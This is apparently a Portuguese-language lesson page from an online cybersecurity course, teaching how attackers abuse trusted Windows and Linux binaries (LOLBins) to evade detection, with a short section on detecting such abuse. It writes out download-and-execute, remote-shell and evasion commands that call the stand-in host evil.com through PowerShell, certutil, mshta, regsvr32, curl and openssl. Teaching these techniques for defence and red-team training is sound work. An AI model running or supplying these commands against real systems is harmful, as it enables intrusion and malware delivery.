0Pricing
Cyber Security Academy · Aula

Binários Living-Off-the-Land (LOLBins)

Use binários confiáveis do Windows (certutil, mshta, regsvr32) para evitar a detecção.

Binários Living-Off-the-Land (LOLBins) é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 2 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.

O que são LOLBins?

Binários Living-Off-the-Land (LOLBins) são binários e ferramentas legítimos do sistema operacional reutilizados por invasores para realizar ações maliciosas. Como são ferramentas do sistema confiáveis e assinadas, geralmente ignoram a lista de permissões de aplicativos e reduzem a detecção por AV/EDR.

Por que os LOLBins são eficazes

Vantagens para os invasores:

  • Sempre estão presentes nos sistemas-alvo — não é necessário inserir novos arquivos
  • Assinados pela Microsoft/Apple — ignoram a detecção baseada em assinaturas
  • São confiáveis para as soluções de lista de permissões de aplicativos
  • Geram árvores de processos com aparência legítima

PowerShell como LOLBin

PowerShell é o LOLBin mais abusado. Os invasores usam:

# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

certutil

certutil.exe é uma ferramenta de certificados do Windows que pode baixar arquivos:

# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exe

mshta e wscript

Execução de scripts por meio de hosts confiáveis:

# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.js

regsvr32 Squiblydoo

regsvr32.exe pode carregar e executar DLLs de URLs remotas por meio dos sinalizadores /s /n /u /i — ignorando o AppLocker e executando código não assinado como um processo confiável:

regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll

Execução com WMIC e WMI

O Windows Management Instrumentation executa código remotamente e localmente:

# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"

Rundll32

rundll32.exe carrega e executa pontos de entrada de DLL:

# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payload

LOLBins do Linux

Equivalentes no Linux:

# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.io

LOLBAS e GTFOBins

Bancos de dados de referência:

  • LOLBAS (lolbas-project.github.io) — binários, scripts e bibliotecas do Windows
  • GTFOBins (gtfobins.github.io) — binários do Linux/macOS para exploração, leitura/gravação de arquivos e elevação de SUID

Detecção do abuso de LOLBins

Estratégias de detecção:

  • Registro de blocos de script do PowerShell (EventID 4104) — registra comandos decodificados
  • Sysmon EventID 1: criação de processos com a cadeia de processos pai
  • Gere alertas para relações pai-filho inesperadas: Word → PowerShell, Excel → cmd
  • Conexões de rede originadas de certutil, mshta e powershell
  • Linhas de base de UEBA para sinalizar o uso anormal de binários

Verificação rápida: LOLBins

Qual binário do Windows pode baixar um arquivo remoto usando o sinalizador -urlcache?

Recapitulação da lição

LOLBins são ferramentas legítimas do sistema operacional reutilizadas para fins maliciosos: PowerShell, certutil, mshta, regsvr32, rundll32 e WMIC no Windows; curl, python e openssl no Linux. Eles ignoram a detecção por assinaturas e as listas de permissões de aplicativos. A detecção exige o registro da criação de processos (Sysmon), o registro de blocos de script do PowerShell e linhas de base comportamentais. LOLBAS e GTFOBins são bancos de dados de referência essenciais.

Perguntas Frequentes

A aula “Binários Living-Off-the-Land (LOLBins)” é grátis?

Sim — o texto completo de “Binários Living-Off-the-Land (LOLBins)” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.

O que vou aprender em “Binários Living-Off-the-Land (LOLBins)”?

Use binários confiáveis do Windows (certutil, mshta, regsvr32) para evitar a detecção. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Cyber Security Academy?

Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 2 de 4.

Quanto tempo leva a aula “Binários Living-Off-the-Land (LOLBins)”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Cyber Security Academy?

Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Frameworks de C2: Cobalt Strike e Sliver
  2. Binários Living-Off-the-Land (LOLBins)
  3. Técnicas de Movimentação Lateral
  4. Redação de Relatórios de Red Team
← Voltar para Cyber Security Academy